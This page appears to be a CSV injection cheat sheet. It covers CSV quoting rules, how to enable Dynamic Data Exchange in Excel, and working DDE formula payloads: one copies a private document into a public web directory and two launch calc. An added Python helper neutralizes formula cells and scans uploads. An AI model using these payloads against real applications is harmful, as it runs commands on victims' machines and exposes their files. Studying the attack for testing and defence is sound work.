- Comma-separated values (Wikipedia)
CSV Format
Fields are separated by commas; a field that contains a comma or a double quote is wrapped in double quotes, and an embedded double quote is written twice:
1997,Ford,E350
"1997","Ford","E350"
1997,Ford,E350,"Super, luxurious truck"
1997,Ford,E350,"Super, ""luxurious"" truck"
CSV Injection
- CSV Injection Payload List
- SANS Holiday Hack Challenge 2018
- Data Extraction to Command Execution CSV Injection (Veracode)
Prerequisite
Excel configuration must allow Dynamic Data Exchange:
- Open Excel and go to Trust Center Settings
- Under Security settings for Dynamic Data Exchange, check Enable Dynamic Data Exchange Server Launch (not recommended)
Examples
Create a CSV file with the following content and upload it to the application. When the exported data is later opened in Excel, the first cell is interpreted as a DDE formula that runs the command, which copies the file into a public directory on the web server.
=cmd|'/C copy C:\\candidate_evaluation.docx C:\\careerportal\\resources\\public\\lisandre.docx'!A0
Line2
Line3
Open the calculator application (a harmless proof that a command is executed; either cell reference form works):
=cmd|' /C calc'!A0
=cmd|' /C calc'!'A1'
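As an added defender-side example (not code from this page or any referenced project), the Python helper below applies the quoting rules from the CSV Format section when exporting, neutralizes cells that a spreadsheet would treat as formulas, and scans an uploaded file for such cells. The trigger characters and the leading-apostrophe mitigation follow the usual OWASP CSV injection guidance; the sample upload is constructed and reuses the page's calc payload.

```python
import csv
import io

# Leading characters that make a spreadsheet evaluate a cell as a formula
# (the page's payloads all start with "="; "+", "-", "@", tab and CR are
# the other triggers listed in the OWASP CSV injection guidance).
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def is_formula_like(value: str) -> bool:
    """True if a string cell would be interpreted as a formula."""
    return value.startswith(FORMULA_TRIGGERS)


def neutralize_cell(value):
    """Prefix formula-looking text with an apostrophe so the spreadsheet
    stores it as literal text (the apostrophe is not displayed).
    Non-string values (e.g. negative numbers) are left alone."""
    if isinstance(value, str) and is_formula_like(value):
        return "'" + value
    return value


def safe_csv(rows):
    """Serialize rows to CSV with every field quoted and embedded
    quotes doubled, after neutralizing formula-like cells."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        writer.writerow([neutralize_cell(c) for c in row])
    return buf.getvalue()


def scan_csv_text(text):
    """Return (row, column, value) for each cell in an uploaded CSV
    that looks like a formula; useful as an upload-time check."""
    findings = []
    for r, row in enumerate(csv.reader(io.StringIO(text))):
        for c, cell in enumerate(row):
            if is_formula_like(cell):
                findings.append((r, c, cell))
    return findings


# Constructed sample upload: one benign row, then the page's calc payload.
SAMPLE_UPLOAD = (
    '1997,Ford,E350,"Super, ""luxurious"" truck"\n'
    "=cmd|' /C calc'!A0,Line2,Line3\n"
)
```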